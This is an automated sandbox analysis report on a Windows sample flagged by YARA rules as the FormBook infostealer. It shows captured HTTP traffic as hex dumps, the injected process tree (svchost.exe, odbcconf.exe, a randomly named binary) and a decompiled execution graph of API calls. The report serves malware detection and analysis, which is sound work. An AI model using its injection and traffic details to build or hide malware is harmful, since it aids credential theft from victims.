                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 49 2f 6f 42 4b 6a 4b 6b 4e 46 67 71 70 48 65 4d 44 67 61 79 4c 48 4a 68 38 6b 54 6e 74 66 67 53 52 68 37 49 78 68 52 2b 32 33 4f 47 6f 72 56 73 45 34 31 7a 53 74 79 50 47 79 57 72 6b 4c 4f 78 39 54 7a 6a 59 31 44 4f 38 2f 59 39 49 4a 4e 4f 64 51 63 7a 4b 65 35 54 43 65 6f 6c 64 59 69 48 6e 4d 68 48 61 52 62 4d 77 46 44 31 57 4b 41 78 77 43 75 65 48 42 38 44 6f 55 6f 7a 6e 35 6b 30 67 36 4e 7a 36 6a 2f 39 55 51 4a 37 59 7a 52 49 67 66 76 69 76 35 75 64 2f 32 6b 43 51 4a 6c 6f 6e 4b 6d 4b 41 4e 50 75 4e 67 68 66 33 4d 75 67 4e 41 4b 6a 7a 4b 66 71 54 4f 43 5a 46 67 53 31 58 6a 4f 42 6d 36 56 31 39 51 68 44 72 4d 6b 69 72 36 50 6f 61 76 4b 2f 53 6a 76 70 74 33 67 6f 32 44 30 52 33 34 63 54 57 43 65 79 49 45 53 38 4b 54 37 44 6d 6e 4a 68 6a 6a 61 57 4f 43 49 70 34 30 58 70 35 2b 6f 34 45 44 35 36 64 70 6b 43 48 51 71 59 58 55 35 73 53 42 30 4b 72 76 48 6c 68 53 42 2b 46 41 73 4a 67 52 42 77 31 61 65 6a 47 44 57 31 4b 50 58 2f 4b 36 56 44 46 35 57 68 47 77 65 73 46 70 41 57 70 [TRUNCATED]
                                                                    Data Ascii: dpy4vDKP=I/oBKjKkNFgqpHeMDgayLHJh8kTntfgSRh7IxhR+23OGorVsE41zStyPGyWrkLOx9TzjY1DO8/Y9IJNOdQczKe5TCeoldYiHnMhHaRbMwFD1WKAxwCueHB8DoUozn5k0g6Nz6j/9UQJ7YzRIgfviv5ud/2kCQJlonKmKANPuNghf3MugNAKjzKfqTOCZFgS1XjOBm6V19QhDrMkir6PoavK/Sjvpt3go2D0R34cTWCeyIES8KT7DmnJhjjaWOCIp40Xp5+o4ED56dpkCHQqYXU5sSB0KrvHlhSB+FAsJgRBw1aejGDW1KPX/K6VDF5WhGwesFpAWpUarQS6H4g+puz5CFg17N4C6pQXugEcJHnUUhMvYxY8sFW3xuFYXq16KQSDzMYEW/sWcrLPUIztz5H69eLoefs3dUvGe2yHZoaHhgtLk1SnTUQXCi91UmFbnFM3wHNSDuSc/4CsgIERMNRPP7uyDtZgZMyVAZiZNFaK4LebnMNHQ+xFgAmtl6fKE+bP6hurfqZ8ONnPvR0S/SnqBx02Grbnk4/mSvSEBwZGZKPtgyV2s5uNpa7Q0iz2w5+cQBAA/Fb5x3s0oa6rrmZ8MA5x4+dmBotenkkAUlkoHo2cK84j7BOZV2DoOXE0Bq1lP+jnmt6X57yIIGLBgdkIr6FKatRY1YFwX9b92DbwkJ2eLcBBtcetHYq16oqaUbTgW2aO85gORD7tnq9n+lJ4SO+DN7rl44RhMg6t3fVtdMQHn8PbEHKYsjefh7XvifRkPAPUaJJvdG+Fde6Hpv8l7O5jmxMdFu3vBOa9c7Z1y2jkOLQG8/zcecdIm48m5M7n4c53C25/o0Fb9SDW8Y8zxUj7cGNkZApUNQBkOfTMxO+VLulggiSF5pwUTAbjDLiMTH+qoLProO1jHJdDCQL13wdahVzHUOfZGfT8le8sahp2f+cZ0zQUbYjAS3n0Px3IlK8PC1r6sFQQUIY8GxLShB5LhreVTPWMaRiO5TYB [TRUNCATED]
                                                                    Dec 5, 2024 09:47:07.713207006 CET1236INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:47:07 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 64 61 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 5b 8f db c6 15 7e f7 af 18 ab c0 4a b2 45 32 9b 14 81 ed 95 b4 4d e2 f4 29 97 02 eb b4 28 36 1b 61 44 8d 24 5a 14 a9 92 d4 ae 65 7b 81 c4 4e 9a 04 31 62 34 0d 50 20 68 d0 1b 8a 3e 15 58 5f b6 d9 f8 b2 f9 0b e4 3f ea 77 ce 90 14 a5 95 e4 4b 9c a2 02 76 45 cd e5 cc 99 73 f9 ce 39 33 ac 9f ee f8 76 34 19 29 d1 8f 86 6e b3 4e ff 85 ed ca 30 6c 94 9c b0 25 3b 72 14 39 bb aa 24 5c e9 f5 1a a5 60 5c c2 18 25 3b cd fa 50 45 52 d8 7d 19 84 2a 6a 94 de bb f4 4b e3 1c fa b8 d5 93 43 d5 28 8d 64 30 70 bc 5e 49 d8 be 17 29 0f 83 02 d5 0b c6 46 00 9a b3 23 77 1d b5 37 f2 83 a8 30 74 cf e9 44 fd 46 47 ed 3a b6 32 f8 47 cd f1 9c c8 91 ae 11 da d2 55 8d 75 90 88 9c c8 55 cd bd bd 3d b3 2b bd 48 86 91 63 4b b3 e3 f4 9c 48 ba 75 4b f7 d6 5d c7 1b 88 40 b9 8d 52 18 4d 5c 15 f6 95 c2 42 43 d5 71 64 a3 24 5d b7 24 fa 81 ea e6 ec 32 7b 86 1c 47 be 69 87 21 16 99 ce 77 b0 91 6c 74 57 82 33 df 33 f1 6f 73 bd 24 48 82 10 d8 50 f6 94 75 c5 e0 81 cd 7a 68 07 ce 28 6a 5a 67 ea [TRUNCATED]
                                                                    Data Ascii: da0Z[~JE2M)(6aD$Ze{N1b4P h>X_?wKvEs93v4)nN0l%;r9$\`\%;PER}*jKC(d0p^I)F#w70tDFG:2GUuU=+HcKHuK]@RM\BCqd$]$2{Gi!wltW33os$HPuzh(jZgXQ xgGU7NYgvvgIs1QZLRs*aZx~jbsnLz~fh:HO*7GK[lL2n#J+NZ^uz@TP[HhwSH]Bq(> wGuAVj?Fp`]X`2[+n&&7l-YLOZ{@4|{}_0,jkgCsH'=O19hvg}vmA3> M?vG6GNpZgdliG\U-XPT\xVp@b$;(?k;i=hu8X,59m`V+oY(OQJ'qq48[?H3fQ}I5B@mV884):.8d878:ESh'Ed2V'tUq_.wmn~N?* [TRUNCATED]
                                                                    Dec 5, 2024 09:47:07.713260889 CET1236INData Raw: 6b 19 3a ea 60 d0 8f d4 7d ba ea 54 fd 05 98 75 8d 21 7c da f1 5a ae ea 46 86 f6 6f 2c 18 05 be d7 7b b2 52 80 c9 30 77 9b 42 da 3f 61 bd 88 5f 10 ef e3 f8 1e ec 8c 29 cc 60 ed bc fb 6a e1 84 e3 b6 56 79 ce 49 db 07 ea 0d 11 31 3d 05 ba df 22 0e
                                                                    Data Ascii: k:`}Tu!|ZFo,{R0wB?a_)`jVyI1="Oy|/r|&5-hjy[8P:.Vo8#}NNoA|Rx$X&LC]a =0V&rHRshnh*/[L-\'zVmaa#D
                                                                    Dec 5, 2024 09:47:07.713274956 CET1202INData Raw: 14 1d d6 92 5d 00 a7 16 16 c6 74 92 b6 b4 2a a6 ce ac 22 96 73 49 39 d7 ff 80 d7 d0 0c da 36 4e a0 2d 9c d5 67 e7 d4 79 95 ac 0f ac 4f 9c 3b 7f 4b 22 26 61 41 4c 90 1b 1d 92 3e 22 0d b3 9a 50 d1 53 9c 5e 5a b9 ae 62 8a cf f4 34 3b c0 e7 be 87 83
                                                                    Data Ascii: ]t*"sI96N-gyO;K"&aAL>"PS^Zb4;Eqd#y!YRAtH5Yz,!RM{R.gUW,5Uv;2WvJ>NWT|3#i"W (x3Ov,+K6\vr07VdK~VDYEuv


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:03:42:59
                                                                    Start date:05/12/2024
                                                                    Path:C:\Users\user\Desktop\SRT68.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\SRT68.exe"
                                                                    Imagebase:0xfa0000
                                                                    File size:1'211'392 bytes
                                                                    MD5 hash:71829B1E3A8CC54976390920F8C9282B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:03:43:00
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\SRT68.exe"
                                                                    Imagebase:0x260000
                                                                    File size:46'504 bytes
                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1489414299.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1488635297.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1489460916.0000000004800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:03:43:02
                                                                    Start date:05/12/2024
                                                                    Path:C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe"
                                                                    Imagebase:0x300000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3835727980.0000000003590000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:4
                                                                    Start time:03:43:04
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\SysWOW64\odbcconf.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\SysWOW64\odbcconf.exe"
                                                                    Imagebase:0xe0000
                                                                    File size:22'016 bytes
                                                                    MD5 hash:D567FFF92055255DBE43BF8F989A4B7E
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3834195003.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3833825431.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3835430269.0000000004BA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:6
                                                                    Start time:03:43:18
                                                                    Start date:05/12/2024
                                                                    Path:C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe"
                                                                    Imagebase:0x300000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:8
                                                                    Start time:03:43:30
                                                                    Start date:05/12/2024
                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                    Imagebase:0x7ff6d20e0000
                                                                    File size:676'768 bytes
                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:3.2%
                                                                      Dynamic/Decrypted Code Coverage:1.3%
                                                                      Signature Coverage:7.9%
                                                                      Total number of Nodes:2000
                                                                      Total number of Limit Nodes:136
                                                                      execution_graph 104119 fdfdfc 104145 faab30 Mailbox _memmove 104119->104145 104123 fab525 104218 1009e4a 89 API calls 4 library calls 104123->104218 104126 fc0db6 59 API calls Mailbox 104143 fa9f37 Mailbox 104126->104143 104127 fe09e5 104224 1009e4a 89 API calls 4 library calls 104127->104224 104128 fe0055 104213 1009e4a 89 API calls 4 library calls 104128->104213 104130 fab475 104214 fa8047 104130->104214 104133 faa55a 104222 1009e4a 89 API calls 4 library calls 104133->104222 104134 fe0064 104135 fab47a 104135->104127 104135->104128 104139 fa7667 59 API calls 104139->104143 104140 fa8047 59 API calls 104140->104143 104142 faa057 104143->104126 104143->104128 104143->104130 104143->104133 104143->104135 104143->104139 104143->104140 104143->104142 104144 fc2d40 67 API calls __cinit 104143->104144 104146 ff6e8f 59 API calls 104143->104146 104148 fe09d6 104143->104148 104174 fac8c0 331 API calls 2 library calls 104143->104174 104175 fab900 60 API calls Mailbox 104143->104175 104144->104143 104145->104123 104145->104142 104145->104143 104152 fc0db6 59 API calls Mailbox 104145->104152 104153 fab2b6 104145->104153 104156 fe086a 104145->104156 104158 fe0878 104145->104158 104160 fe085c 104145->104160 104161 fab21c 104145->104161 104165 ff6e8f 59 API calls 104145->104165 104168 101df37 104145->104168 104171 101df23 104145->104171 104176 fa9ea0 104145->104176 104200 fa9c90 59 API calls Mailbox 104145->104200 104204 101c193 85 API calls 2 library calls 104145->104204 104205 101c2e0 96 API calls Mailbox 104145->104205 104206 1007956 59 API calls Mailbox 104145->104206 104207 fa7de1 104145->104207 104211 101bc6b 331 API calls Mailbox 104145->104211 104212 ff617e 59 API calls Mailbox 104145->104212 104146->104143 104223 1009e4a 89 API calls 4 library calls 104148->104223 104152->104145 104203 faf6a3 331 API calls 104153->104203 104220 fa9c90 59 API calls Mailbox 104156->104220 104221 1009e4a 89 API calls 4 library calls 104158->104221 104160->104142 104219 ff617e 59 API calls Mailbox 104160->104219 104201 fa9d3c 60 API calls Mailbox 104161->104201 104163 fab22d 104202 fa9d3c 60 API calls Mailbox 104163->104202 104165->104145 104225 101cadd 104168->104225 104170 101df47 104170->104145 104172 101cadd 130 API calls 104171->104172 104173 101df33 104172->104173 104173->104145 104174->104143 104175->104143 104177 fa9ebf 104176->104177 104195 fa9eed Mailbox 104176->104195 104178 fc0db6 Mailbox 59 API calls 104177->104178 104178->104195 104179 fab475 104180 fa8047 59 API calls 104179->104180 104191 faa057 104180->104191 104181 fab47a 104183 fe09e5 104181->104183 104184 fe0055 104181->104184 104182 fa7667 59 API calls 104182->104195 104429 1009e4a 89 API calls 4 library calls 104183->104429 104426 1009e4a 89 API calls 4 library calls 104184->104426 104188 faa55a 104427 1009e4a 89 API calls 4 library calls 104188->104427 104189 fc0db6 59 API calls Mailbox 104189->104195 104190 fa8047 59 API calls 104190->104195 104191->104145 104192 fe0064 104192->104145 104195->104179 104195->104181 104195->104182 104195->104184 104195->104188 104195->104189 104195->104190 104195->104191 104196 ff6e8f 59 API calls 104195->104196 104197 fc2d40 67 API calls __cinit 104195->104197 104198 fe09d6 104195->104198 104424 fac8c0 331 API calls 2 library calls 104195->104424 104425 fab900 60 API calls Mailbox 104195->104425 104196->104195 104197->104195 104428 1009e4a 89 API calls 4 library calls 104198->104428 104200->104145 104201->104163 104202->104153 104203->104123 104204->104145 104205->104145 104206->104145 104208 fa7df0 __NMSG_WRITE _memmove 104207->104208 104209 fc0db6 Mailbox 59 API calls 104208->104209 104210 fa7e2e 104209->104210 104210->104145 104211->104145 104212->104145 104213->104134 104215 fa805a 104214->104215 104216 fa8052 104214->104216 104215->104142 104430 fa7f77 59 API calls 2 library calls 104216->104430 104218->104160 104219->104142 104220->104160 104221->104160 104222->104142 104223->104127 104224->104142 104263 fa9837 104225->104263 104228 101cb61 Mailbox 104228->104170 104230 101cbb2 Mailbox 104230->104228 104236 fa9837 84 API calls 104230->104236 104250 101cdb9 104230->104250 104313 101fbce 59 API calls 2 library calls 104230->104313 104314 101cfdf 61 API calls 2 library calls 104230->104314 104231 101cf2e 104331 101d8c8 92 API calls Mailbox 104231->104331 104234 101cf3d 104235 101cdc7 104234->104235 104237 101cf49 104234->104237 104294 101c96e 104235->104294 104236->104230 104237->104228 104242 101ce00 104309 fc0c08 104242->104309 104245 101ce33 104316 fa92ce 104245->104316 104246 101ce1a 104315 1009e4a 89 API calls 4 library calls 104246->104315 104249 101ce25 GetCurrentProcess TerminateProcess 104249->104245 104250->104231 104250->104235 104255 101cfa4 104255->104228 104257 101cfb8 FreeLibrary 104255->104257 104256 101ce6b 104328 101d649 107 API calls _free 104256->104328 104257->104228 104262 101ce7c 104262->104255 104329 fa8d40 59 API calls Mailbox 104262->104329 104330 fa9d3c 60 API calls Mailbox 104262->104330 104332 101d649 107 API calls _free 104262->104332 104264 fa9851 104263->104264 104273 fa984b 104263->104273 104265 fa9899 104264->104265 104266 fdf4da 104264->104266 104268 fa9857 __itow 104264->104268 104269 fdf5d3 __i64tow 104264->104269 104343 fc3698 83 API calls 3 library calls 104265->104343 104274 fc0db6 Mailbox 59 API calls 104266->104274 104280 fdf552 Mailbox _wcscpy 104266->104280 104333 fc0db6 104268->104333 104269->104269 104272 fa9871 104272->104273 104275 fa7de1 59 API calls 104272->104275 104273->104228 104281 101d7a5 104273->104281 104276 fdf51f 104274->104276 104275->104273 104277 fc0db6 Mailbox 59 API calls 104276->104277 104278 fdf545 104277->104278 104279 fa7de1 59 API calls 104278->104279 104278->104280 104279->104280 104344 fc3698 83 API calls 3 library calls 104280->104344 104373 fa7e4f 104281->104373 104283 101d7c0 CharLowerBuffW 104377 fff167 104283->104377 104290 101d810 104402 fa7d2c 104290->104402 104292 101d81c Mailbox 104293 101d858 Mailbox 104292->104293 104406 101cfdf 61 API calls 2 library calls 104292->104406 104293->104230 104295 101c989 104294->104295 104299 101c9de 104294->104299 104296 fc0db6 Mailbox 59 API calls 104295->104296 104298 101c9ab 104296->104298 104297 fc0db6 Mailbox 59 API calls 104297->104298 104298->104297 104298->104299 104300 101da50 104299->104300 104301 101dc79 Mailbox 104300->104301 104308 101da73 _strcat _wcscpy __NMSG_WRITE 104300->104308 104301->104242 104302 fa9b98 59 API calls 104302->104308 104303 fa9be6 59 API calls 104303->104308 104304 fa9b3c 59 API calls 104304->104308 104305 fa9837 84 API calls 104305->104308 104306 fc571c 58 API calls __crtGetStringTypeA_stat 104306->104308 104308->104301 104308->104302 104308->104303 104308->104304 104308->104305 104308->104306 104413 1005887 61 API calls 2 library calls 104308->104413 104310 fc0c1d 104309->104310 104311 fc0cb5 VirtualProtect 104310->104311 104312 fc0c83 104310->104312 104311->104312 104312->104245 104312->104246 104313->104230 104314->104230 104315->104249 104317 fa92d6 104316->104317 104318 fc0db6 Mailbox 59 API calls 104317->104318 104319 fa92e4 104318->104319 104320 fa92f0 104319->104320 104414 fa91fc 59 API calls Mailbox 104319->104414 104322 fa9050 104320->104322 104415 fa9160 104322->104415 104324 fa905f 104325 fc0db6 Mailbox 59 API calls 104324->104325 104326 fa90fb 104324->104326 104325->104326 104326->104262 104327 fa8d40 59 API calls Mailbox 104326->104327 104327->104256 104328->104262 104329->104262 104330->104262 104331->104234 104332->104262 104335 fc0dbe 104333->104335 104336 fc0dd8 104335->104336 104338 fc0ddc std::exception::exception 104335->104338 104345 fc571c 104335->104345 104362 fc33a1 DecodePointer 104335->104362 104336->104272 104363 fc859b RaiseException 104338->104363 104340 fc0e06 104364 fc84d1 58 API calls _free 104340->104364 104342 fc0e18 104342->104272 104343->104268 104344->104269 104346 fc5797 104345->104346 104351 fc5728 104345->104351 104371 fc33a1 DecodePointer 104346->104371 104348 fc5733 104348->104351 104365 fca16b 58 API calls __NMSG_WRITE 104348->104365 104366 fca1c8 58 API calls 4 library calls 104348->104366 104367 fc309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104348->104367 104349 fc579d 104372 fc8b28 58 API calls __getptd_noexit 104349->104372 104351->104348 104353 fc575b RtlAllocateHeap 104351->104353 104356 fc5783 104351->104356 104360 fc5781 104351->104360 104368 fc33a1 DecodePointer 104351->104368 104353->104351 104355 fc578f 104353->104355 104355->104335 104369 fc8b28 58 API calls __getptd_noexit 104356->104369 104370 fc8b28 58 API calls __getptd_noexit 104360->104370 104362->104335 104363->104340 104364->104342 104365->104348 104366->104348 104368->104351 104369->104360 104370->104355 104371->104349 104372->104355 104374 fa7e62 104373->104374 104376 fa7e5f _memmove 104373->104376 104375 fc0db6 Mailbox 59 API calls 104374->104375 104375->104376 104376->104283 104378 fff192 __NMSG_WRITE 104377->104378 104379 fff1d1 104378->104379 104382 fff1c7 104378->104382 104383 fff278 104378->104383 104379->104292 104384 fa7667 104379->104384 104382->104379 104407 fa78c4 61 API calls 104382->104407 104383->104379 104408 fa78c4 61 API calls 104383->104408 104385 fc0db6 Mailbox 59 API calls 104384->104385 104386 fa7688 104385->104386 104387 fc0db6 Mailbox 59 API calls 104386->104387 104388 fa7696 104387->104388 104389 fa784b 104388->104389 104390 fa785a 104389->104390 104391 fa78b7 104389->104391 104390->104391 104393 fa7865 104390->104393 104392 fa7d2c 59 API calls 104391->104392 104398 fa7888 _memmove 104392->104398 104394 fdeb09 104393->104394 104395 fa7880 104393->104395 104410 fa8029 104394->104410 104409 fa7f27 59 API calls Mailbox 104395->104409 104398->104290 104399 fdeb13 104400 fc0db6 Mailbox 59 API calls 104399->104400 104401 fdeb33 104400->104401 104403 fa7d43 _memmove 104402->104403 104404 fa7d3a 104402->104404 104403->104292 104404->104403 104405 fa7e4f 59 API calls 104404->104405 104405->104403 104406->104293 104407->104382 104408->104383 104409->104398 104411 fc0db6 Mailbox 59 API calls 104410->104411 104412 fa8033 104411->104412 104412->104399 104413->104308 104414->104320 104416 fa9169 Mailbox 104415->104416 104417 fdf19f 104416->104417 104422 fa9173 104416->104422 104418 fc0db6 Mailbox 59 API calls 104417->104418 104420 fdf1ab 104418->104420 104419 fa917a 104419->104324 104422->104419 104423 fa9c90 59 API calls Mailbox 104422->104423 104423->104422 104424->104195 104425->104195 104426->104192 104427->104191 104428->104183 104429->104191 104430->104215 104431 fe416f 104435 ff5fe6 104431->104435 104433 fe417a 104434 ff5fe6 85 API calls 104433->104434 104434->104433 104436 ff5ff3 104435->104436 104445 ff6020 104435->104445 104437 ff6022 104436->104437 104438 ff6027 104436->104438 104443 ff601a 104436->104443 104436->104445 104456 fa9328 84 API calls Mailbox 104437->104456 104440 fa9837 84 API calls 104438->104440 104441 ff602e 104440->104441 104446 fa7b2e 104441->104446 104455 fa95a0 59 API calls _wcsstr 104443->104455 104445->104433 104447 fdec6b 104446->104447 104448 fa7b40 104446->104448 104463 ff7bdb 59 API calls _memmove 104447->104463 104457 fa7a51 104448->104457 104451 fa7b4c 104451->104445 104452 fdec75 104453 fa8047 59 API calls 104452->104453 104454 fdec7d Mailbox 104453->104454 104455->104445 104456->104438 104458 fa7a5f 104457->104458 104462 fa7a85 _memmove 104457->104462 104459 fc0db6 Mailbox 59 API calls 104458->104459 104458->104462 104460 fa7ad4 104459->104460 104461 fc0db6 Mailbox 59 API calls 104460->104461 104461->104462 104462->104451 104463->104452 104464 15b0b88 104478 15ae7d8 104464->104478 104466 15b0c2c 104481 15b0a78 104466->104481 104484 15b1c58 GetPEB 104478->104484 104480 15aee63 104480->104466 104482 15b0a81 Sleep 104481->104482 104483 15b0a8f 104482->104483 104485 15b1c82 104484->104485 104485->104480 104486 fa107d 104491 fa708b 104486->104491 104488 fa108c 104522 fc2d40 104488->104522 104492 fa709b __ftell_nolock 104491->104492 104493 fa7667 59 API calls 104492->104493 104494 fa7151 104493->104494 104525 fa4706 104494->104525 104496 fa715a 104532 fc050b 104496->104532 104503 fa7667 59 API calls 104504 fa718b 104503->104504 104551 fa7d8c 104504->104551 104506 fa7194 RegOpenKeyExW 104507 fde8b1 RegQueryValueExW 104506->104507 104511 fa71b6 Mailbox 104506->104511 104508 fde8ce 104507->104508 104509 fde943 RegCloseKey 104507->104509 104510 fc0db6 Mailbox 59 API calls 104508->104510 104509->104511 104520 fde955 _wcscat Mailbox __NMSG_WRITE 104509->104520 104512 fde8e7 104510->104512 104511->104488 104555 fa522e 104512->104555 104515 fde90f 104558 fa7bcc 104515->104558 104517 fde929 104517->104509 104518 fa7de1 59 API calls 104518->104520 104519 fa3f74 59 API calls 104519->104520 104520->104511 104520->104518 104520->104519 104521 fa79f2 59 API calls 104520->104521 104521->104520 104589 fc2c44 104522->104589 104524 fa1096 104567 fd1940 104525->104567 104528 fa7de1 59 API calls 104529 fa4739 104528->104529 104569 fa4750 104529->104569 104531 fa4743 Mailbox 104531->104496 104533 fd1940 __ftell_nolock 104532->104533 104534 fc0518 GetFullPathNameW 104533->104534 104535 fc053a 104534->104535 104536 fa7bcc 59 API calls 104535->104536 104537 fa7165 104536->104537 104538 fa7cab 104537->104538 104539 fa7cbf 104538->104539 104540 fded4a 104538->104540 104583 fa7c50 104539->104583 104542 fa8029 59 API calls 104540->104542 104544 fded55 __NMSG_WRITE _memmove 104542->104544 104543 fa7173 104545 fa3f74 104543->104545 104546 fa3f82 104545->104546 104550 fa3fa4 _memmove 104545->104550 104548 fc0db6 Mailbox 59 API calls 104546->104548 104547 fc0db6 Mailbox 59 API calls 104549 fa3fb8 104547->104549 104548->104550 104549->104503 104550->104547 104552 fa7d99 104551->104552 104553 fa7da6 104551->104553 104552->104506 104554 fc0db6 Mailbox 59 API calls 104553->104554 104554->104552 104556 fc0db6 Mailbox 59 API calls 104555->104556 104557 fa5240 RegQueryValueExW 104556->104557 104557->104515 104557->104517 104559 fa7bd8 __NMSG_WRITE 104558->104559 104560 fa7c45 104558->104560 104562 fa7bee 104559->104562 104563 fa7c13 104559->104563 104561 fa7d2c 59 API calls 104560->104561 104566 fa7bf6 _memmove 104561->104566 104588 fa7f27 59 API calls Mailbox 104562->104588 104565 fa8029 59 API calls 104563->104565 104565->104566 104566->104517 104568 fa4713 GetModuleFileNameW 104567->104568 104568->104528 104570 fd1940 __ftell_nolock 104569->104570 104571 fa475d GetFullPathNameW 104570->104571 104572 fa4799 104571->104572 104573 fa477c 104571->104573 104574 fa7d8c 59 API calls 104572->104574 104575 fa7bcc 59 API calls 104573->104575 104576 fa4788 104574->104576 104575->104576 104579 fa7726 104576->104579 104580 fa7734 104579->104580 104581 fa7d2c 59 API calls 104580->104581 104582 fa4794 104581->104582 104582->104531 104584 fa7c5f __NMSG_WRITE 104583->104584 104585 fa8029 59 API calls 104584->104585 104586 fa7c70 _memmove 104584->104586 104587 fded07 _memmove 104585->104587 104586->104543 104588->104566 104590 fc2c50 __initptd 104589->104590 104597 fc3217 104590->104597 104596 fc2c77 __initptd 104596->104524 104614 fc9c0b 104597->104614 104599 fc2c59 104600 fc2c88 DecodePointer DecodePointer 104599->104600 104601 fc2cb5 104600->104601 104602 fc2c65 104600->104602 104601->104602 104660 fc87a4 59 API calls __cftof_l 104601->104660 104611 fc2c82 104602->104611 104604 fc2d18 EncodePointer EncodePointer 104604->104602 104605 fc2cc7 104605->104604 104606 fc2cec 104605->104606 104661 fc8864 61 API calls 2 library calls 104605->104661 104606->104602 104610 fc2d06 EncodePointer 104606->104610 104662 fc8864 61 API calls 2 library calls 104606->104662 104609 fc2d00 104609->104602 104609->104610 104610->104604 104663 fc3220 104611->104663 104615 fc9c1c 104614->104615 104616 fc9c2f EnterCriticalSection 104614->104616 104621 fc9c93 104615->104621 104616->104599 104618 fc9c22 104618->104616 104645 fc30b5 58 API calls 3 library calls 104618->104645 104622 fc9c9f __initptd 104621->104622 104623 fc9ca8 104622->104623 104624 fc9cc0 104622->104624 104646 fca16b 58 API calls __NMSG_WRITE 104623->104646 104630 fc9ce1 __initptd 104624->104630 104649 fc881d 58 API calls 2 library calls 104624->104649 104626 fc9cad 104647 fca1c8 58 API calls 4 library calls 104626->104647 104629 fc9cd5 104632 fc9cdc 104629->104632 104633 fc9ceb 104629->104633 104630->104618 104631 fc9cb4 104648 fc309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104631->104648 104650 fc8b28 58 API calls __getptd_noexit 104632->104650 104635 fc9c0b __lock 58 API calls 104633->104635 104637 fc9cf2 104635->104637 104639 fc9cff 104637->104639 104640 fc9d17 104637->104640 104651 fc9e2b InitializeCriticalSectionAndSpinCount 104639->104651 104652 fc2d55 104640->104652 104643 fc9d0b 104658 fc9d33 LeaveCriticalSection _doexit 104643->104658 104646->104626 104647->104631 104649->104629 104650->104630 104651->104643 104653 fc2d5e RtlFreeHeap 104652->104653 104654 fc2d87 __dosmaperr 104652->104654 104653->104654 104655 fc2d73 104653->104655 104654->104643 104659 fc8b28 58 API calls 